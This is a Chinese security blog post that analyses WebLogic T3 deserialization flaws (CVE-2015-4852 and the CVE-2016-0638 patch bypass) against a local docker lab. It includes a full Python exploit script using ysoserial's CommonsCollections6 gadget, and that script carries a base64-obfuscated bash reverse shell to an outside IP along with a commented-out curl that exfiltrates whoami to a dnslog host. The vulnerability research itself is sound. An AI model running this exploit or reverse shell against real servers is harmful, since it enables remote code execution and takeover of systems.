<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="desktop" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>Weblogic漏洞分析(一) | F4miti0n&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="前言本文主要分析Weblogic的反序列化漏洞，在weblogic里面其实反序列化漏洞利用中大致可以分为两种，一种是基于T3协议的反序列化漏洞，一种是基于XML的反序列化漏洞。 基于T3协议漏洞： CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628、CVE-2020-2555、CVE-2020-2883 基于XML:CVE-2017-35">
<meta property="og:type" content="article">
<meta property="og:title" content="Weblogic漏洞分析(一)">
<meta property="og:url" content="http://example.com/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/index.html">
<meta property="og:site_name" content="F4miti0n&#39;s Blog">
<meta property="og:description" content="前言本文主要分析Weblogic的反序列化漏洞，在weblogic里面其实反序列化漏洞利用中大致可以分为两种，一种是基于T3协议的反序列化漏洞，一种是基于XML的反序列化漏洞。 基于T3协议漏洞： CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628、CVE-2020-2555、CVE-2020-2883 基于XML:CVE-2017-35">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/cover21.jpg">
<meta property="article:published_time" content="2024-02-26T08:13:00.000Z">
<meta property="article:modified_time" content="2024-02-26T08:49:28.247Z">
<meta property="article:author" content="F4miti0n">
<meta property="article:tag" content="Java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/cover21.jpg">
  
    <link rel="alternate" href="/atom.xml" title="F4miti0n's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>F4miti0n's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <img src="/images/avatar.png" alt="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">F4miti0n </div>
      <div class="dot"></div>
      <div class="subtitle">每天都在对抗无趣的生活 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E5%A4%8D%E7%8E%B0/" rel="tag">CTF复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E6%80%BB%E7%BB%93/" rel="tag">CTF总结</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HackTheBox/" rel="tag">HackTheBox</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%89%E5%8D%93%E6%B8%97%E9%80%8F/" rel="tag">安卓渗透</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%97%B2%E8%B0%88/" rel="tag">闲谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          January 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">6 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/08 ">
          August 2023 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          July 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/05 ">
          May 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/04 ">
          April 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          March 2023 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/03/10/RASPDemo/">
            <div class="recent-link-text">
              从零开始的RASP学习
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/">
            <div class="recent-link-text">
              Weblogic漏洞分析(一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/">
            <div class="recent-link-text">
              Jackson漏洞分析 (一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/">
            <div class="recent-link-text">
              关于2023的年度总结
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
            <div class="recent-link-text">
              Mysql任意文件读取
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-Weblogic漏洞分析(一)" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
<div class="article-gallery">
  <div class="article-gallery-photos">
    
      <a class="article-gallery-img" rel="gallery_cmljqmlri0018m0wddwntauqg">
        <img src="/images/cover21.jpg" itemprop="image">
      </a>
    
  </div>
</div>

   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        Weblogic漏洞分析(一)
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2024-02-26T08:13:00.000Z" itemprop="datePublished">2024-02-26</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            2.8k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本文主要分析Weblogic的反序列化漏洞，在weblogic里面其实反序列化漏洞利用中大致可以分为两种，一种是基于T3协议的反序列化漏洞，一种是基于XML的反序列化漏洞。</p>
<p>基于T3协议漏洞： CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628、CVE-2020-2555、CVE-2020-2883</p>
<p>基于XML:CVE-2017-3506、CVE-2017-10271、CVE-2019-2729</p>
<h2 id="T3协议"><a href="#T3协议" class="headerlink" title="T3协议"></a>T3协议</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>T3协议是一种基于Java远程方法调用（RMI）实现的协议，它在WebLogic Server中用于实现客户端和服务器之间的通信。其主要功能是使用Java对象进行通信，能够传输包括Java对象在内的各种数据类型，实现WebLogic Server集群中不同服务器之间的通信和数据传输，以便实现负载均衡等功能。与传统的RMI通信协议相比，它提供了一些额外的特性，如服务端可以持续追踪监控客户端是否存活的心跳机制，以及通过建立一次连接完成全部数据包传输，从而优化了数据包大小和网络消耗。此外，T3协议还包含了请求头和请求主体两部分，这些部分分为七个部分，其中第一部分是协议头，后面的2-7都是请求主题，这有助于更好地理解和管理通信过程。</p>
<h3 id="T3协议结构"><a href="#T3协议结构" class="headerlink" title="T3协议结构"></a>T3协议结构</h3><h4 id="头部"><a href="#头部" class="headerlink" title="头部"></a>头部</h4><p>首先，T3协议包含请求包头和请求的主体这两部分内容。这意味着在数据包发送之前，需要先发送一个头部（header），其中包括请求的ID、长度等信息。例如，客户端首先发送一个T3数据包的头部，如<code>t3 12.2.1 AS:255 HL:19 MS:10000000 PU:t3://us-l-breens:7001</code>，其中<code>12.2.1</code>表示本地客户端请求，<code>AS</code>是对象的大小，<code>HL</code>是header的长度，<code>PU</code>指定目标。</p>
<p>简单写个socket发包脚本,wireshark选择any追踪流分析一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">T3Test</span>(<span class="params">ip,port</span>):  </span><br><span class="line">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  </span><br><span class="line">    sock.connect((ip, port))  </span><br><span class="line">    handshake = <span class="string">&quot;t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n&quot;</span> <span class="comment">#请求包的头  </span></span><br><span class="line">    sock.sendall(handshake.encode())  </span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line">        data = sock.recv(<span class="number">1024</span>)  </span><br><span class="line">        <span class="built_in">print</span>(data.decode())  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:  </span><br><span class="line">    ip = <span class="string">&quot;localhost&quot;</span>  </span><br><span class="line">    port = <span class="number">7001</span>  </span><br><span class="line">  </span><br><span class="line">    T3Test(ip,port)</span><br></pre></td></tr></table></figure>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240222225326.png"><br>在这个请求包中，还包含了一个HELO响应，这通常是服务器向客户端返回的第一个消息。在这个响应中，服务器给出了自己的版本号，即10.3.6.0.false ，并指定了另一个端口号2048。</p>
<h4 id="请求主体"><a href="#请求主体" class="headerlink" title="请求主体"></a>请求主体</h4><p>我们发送的请求主体，可以被划分为七部分内容，至于这7个部分有什么区别联系，可以参考下面两张图<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/T3%281%29.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/T3%282%29.png"></p>
<p>第一个非 Java 序列化数据，也就是我们的请求头：<code>t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n</code><br>剩下的就是主体部分。不难看出，每一部分序列化数据前缀都是<code>ac ed 00 05</code>，通过这个特征，我们就可以把这些部分做出一个合理的区分。而我们的poc构造，其关键就在于将恶意序列化数据替换掉2-7这几个部分里的序列化数据，形象一点地表示就是下图这样 (只需要替换掉其中一个就行)</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/AnyEvilCode.jpg"></p>
<p>当然，只保留一部分的序列化数据也是合理的，下面这种利用方式也同样可以奏效<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/c6054c8cd52e8ccaaa67cc4621a8e36d.png"></p>
<h2 id="CVE-2015-4852"><a href="#CVE-2015-4852" class="headerlink" title="CVE-2015-4852"></a>CVE-2015-4852</h2><p>挺经典的洞，这里也是跟着研究一下，准备好的poc如下，打的CC6</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_payload1</span>(<span class="params">gadget, command</span>):</span><br><span class="line">    JAR_FILE = <span class="string">&#x27;ysoserial-all.jar&#x27;</span></span><br><span class="line">    popen = subprocess.Popen([<span class="string">&#x27;java&#x27;</span>, <span class="string">&#x27;-jar&#x27;</span>, JAR_FILE, gadget, command], stdout=subprocess.PIPE)</span><br><span class="line">    <span class="keyword">return</span> popen.stdout.read()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_payload2</span>(<span class="params">path</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">return</span> f.read()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exp</span>(<span class="params">host, port, payload</span>):</span><br><span class="line">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    sock.connect((host, port))</span><br><span class="line"></span><br><span class="line">    handshake = <span class="string">&quot;t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n&quot;</span>.encode()</span><br><span class="line">    sock.sendall(handshake)</span><br><span class="line">    data = sock.recv(<span class="number">1024</span>)</span><br><span class="line">    pattern = re.<span class="built_in">compile</span>(<span class="string">r&quot;HELO:(.*).false&quot;</span>)</span><br><span class="line">    version = re.findall(pattern, data.decode())</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(version) == <span class="number">0</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Not Weblogic&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Weblogic &#123;&#125;&quot;</span>.<span class="built_in">format</span>(version[<span class="number">0</span>]))</span><br><span class="line">    data_len = binascii.a2b_hex(<span class="string">b&quot;00000000&quot;</span>) <span class="comment">#数据包长度，先占位，后面会根据实际情况重新</span></span><br><span class="line">    t3header = binascii.a2b_hex(<span class="string">b&quot;016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006&quot;</span>) <span class="comment">#t3协议头</span></span><br><span class="line">    flag = binascii.a2b_hex(<span class="string">b&quot;fe010000&quot;</span>) <span class="comment">#反序列化数据标志</span></span><br><span class="line">    payload = data_len + t3header + flag + payload</span><br><span class="line">    payload = struct.pack(<span class="string">&#x27;&gt;I&#x27;</span>, <span class="built_in">len</span>(payload)) + payload[<span class="number">4</span>:] <span class="comment">#重新计算数据包长度</span></span><br><span class="line">    sock.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    host = <span class="string">&quot;localhost&quot;</span></span><br><span class="line">    port = <span class="number">7001</span></span><br><span class="line">    gadget = <span class="string">&quot;CommonsCollections6&quot;</span> <span class="comment">#CommonsCollections1 Jdk7u21</span></span><br><span class="line">    command = <span class="string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1MS4xNy83Nzc3IDA+JjEgCg==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span></span><br><span class="line">    <span class="comment"># command = &quot;curl http://`whoami`.5dhwnx.dnslog.cn&quot;</span></span><br><span class="line"></span><br><span class="line">    payload = get_payload1(gadget, command)</span><br><span class="line">    exp(host, port, payload)</span><br></pre></td></tr></table></figure>
<p>执行结果如下<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240223205343.png"><br>wireshark抓包分析一下，发现ysoserial的恶意payload已经插进去了</p>
<ol>
<li>数据包长度</li>
<li>T3协议头</li>
<li>反序列化标志：T3协议中每个反序列化数据包前面都带有fe 01 00 00，再加上反序列化标志ac ed 00 05就变成了fe 01 00 00 ac ed 00 05</li>
<li>序列化数据<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240223210755.png"></li>
</ol>
<h3 id="远程调试环境搭建"><a href="#远程调试环境搭建" class="headerlink" title="远程调试环境搭建"></a>远程调试环境搭建</h3><p>远程环境是docker起的，先把这几个依赖给拿出来</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">docker cp weblogic1036jdk8u202:/u01/app/oracle/middleware/modules `pwd`  </span><br><span class="line">docker cp weblogic1036jdk8u202:/u01/app/oracle/middleware/wlserver `pwd`</span><br><span class="line">docker cp weblogic1036jdk8u202:/u01/app/oracle/middleware/coherence_3.7/lib `pwd`</span><br></pre></td></tr></table></figure>
<p>idea在项目结构里把这几个东西加到库里边导入依赖<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224004616.png"><br>在docker里运行如下命令，若出现如下界面，则代表启动正常</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sh /u01/app/oracle/Domains/ExampleSilentWTDomain/startWebLogic.sh</span><br></pre></td></tr></table></figure>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224004843.png"><br>idea里面做如下配置，端口和主机都要对应上远程环境<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224004921.png"><br>在<code>InboundMsgAbbrev#readObject</code>处打上断点，同时打poc<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224005035.png"><br>调试环境搭建成功<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224005354.png"></p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>接着上面的步骤来分析，先看到45行<code>ServerChannelInputStream</code>这块，此时var1封装着未被解析的序列化数据，跟进此处的<code>new ServerChannelInputStream(var1)</code><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224013333.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224193827.png"></p>
<p><code>ServerChannelInputStream</code>是个继承于<code>ObjectInputStream</code>的内部类，并且重写了<code>resolveClass</code>方法。这里<code>resolveClass</code>先打个断点就不管它了，跟进<code>getServerChannel()</code>看看。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224013750.png"></p>
<p>返回了一个<code>ServerChannel</code>对象，此处的<code>connection</code>包含了一堆相关的信息。该方法的意义就在于处理我们的T3协议所传递的信息，没有必要管他，直接步过，。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224014039.png"></p>
<p>回头看看我们这里返回的对象，其实就是解析出了一堆socket信息，整理了下信息流，在得到信息流之后再进行<code>readObject</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224014625.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224194627.png"><br>因为这里的<code>readObject</code>并没有进行重写，所以本质还是<code>ObjectInputStream</code>的那一套，唯一不同的地方就在于<code>resolveClass</code>是被重写过的，当<code>ObjectInputStream</code>调到<code>resolveClass</code>的时候，其实用的是<code>ServerChannel</code> 重写过的  <code>resolveClass</code>。中间那套原生反序列化的分析步骤就先越过了，直接看<code>ServerChannel#resovleClass</code>这个重写方法。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240224014807.png"></p>
<p>大体看了一下源码，发现和原生反序列化实现的效果没什么区别，黑名单之类的防护措施都没有做，故而造成反序列化漏洞，其大体流程可按下图总结。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/T3.png"></p>
<h2 id="CVE-2016-0638（修复绕过）"><a href="#CVE-2016-0638（修复绕过）" class="headerlink" title="CVE-2016-0638（修复绕过）"></a>CVE-2016-0638（修复绕过）</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>因为CVE-2016-0638其实就是CVE-2015-4852的修复绕过，我们只需要在原有环境基础上把补丁打好就行。如图所示，我们先把补丁复制到docker里面去<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240225190535.png"><br>之后依次键入以下命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cd /u01/app/oracle/middleware/utils/bsu</span><br><span class="line">mkdir cache_dir</span><br><span class="line">cp /home/p20780171_1036_Generic/* ./cache_dir/</span><br><span class="line">cp /home/p22248372_1036012_Generic/* ./cache_dir/</span><br><span class="line">vi bsu.sh</span><br><span class="line">./bsu.sh -install -patch_download_dir=/u01/app/oracle/middleware/utils/bsu/cache_dir/ -patchlist=EJUW -prod_dir=/u01/app/oracle/middleware/wlserver -verbose</span><br><span class="line">./bsu.sh -install -patch_download_dir=/u01/app/oracle/middleware/utils/bsu/cache_dir/ -patchlist=ZLNA -prod_dir=/u01/app/oracle/middleware/wlserver -verbose</span><br></pre></td></tr></table></figure>
<p>最后两条命令运行时间可能稍长点，返回以下界面即代表运行无误<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240225191021.png"><br>搞完之后重启一下docker，发现原来的poc已经打不通了，证明修复成功<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240225191327.png"><br>之后就和之前一样了，把依赖包拉到项目里面分析即可</p>
<h3 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>毕竟本质是个补丁的bypass，我们先看下原有的补丁是怎么打的<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240225231319.png"><br>简单粗暴地在<code>resolveClass</code>加了个黑，相关名单如下所示</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">BLACK_LIST_PROPERTY</span> <span class="operator">=</span> <span class="string">&quot;weblogic.rmi.blacklist&quot;</span>;  </span><br><span class="line"><span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">DISABLE_DEFAULT_BLACKLIST_PROPERTY</span> <span class="operator">=</span> <span class="string">&quot;weblogic.rmi.disabledefaultblacklist&quot;</span>;  </span><br><span class="line"><span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">DISABLE_BLACK_LIST_PROPERTY</span> <span class="operator">=</span> <span class="string">&quot;weblogic.rmi.disableblacklist&quot;</span>;  </span><br><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">DEFAULT_BLACK_LIST</span> <span class="operator">=</span> <span class="string">&quot;+org.apache.commons.collections.functors,+com.sun.org.apache.xalan.internal.xsltc.trax,+javassist,+org.codehaus.groovy.runtime.ConvertedClosure,+org.codehaus.groovy.runtime.ConversionHandler,+org.codehaus.groovy.runtime.MethodClosure&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>这里的bypass是一个二次反序列化的实战案例，用到了<code>StreamMessageImpl</code>这个类。我们先简单看一下这个类的关键源码。<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Weblogic(1)/Pasted%20image%2020240226142119.png"></p>
<p>在<code>readExternal</code>里面对var5进行了<code>readObject</code>调用，并且这里的var5还是个<code>ObjectInputStream</code>对象，再加上<code>readExternal</code>本质上和<code>readObject</code>处于同等触发难度，妥妥的二次反序列化节点，接下来我们分析一下payload，这里用到的生成器是<code>weblogic_cmd</code>，下载地址如下 <a target="_blank" rel="noopener" href="https://github.com/5up3rc/weblogic_cmd/">https://github.com/5up3rc/weblogic_cmd/</a></p>
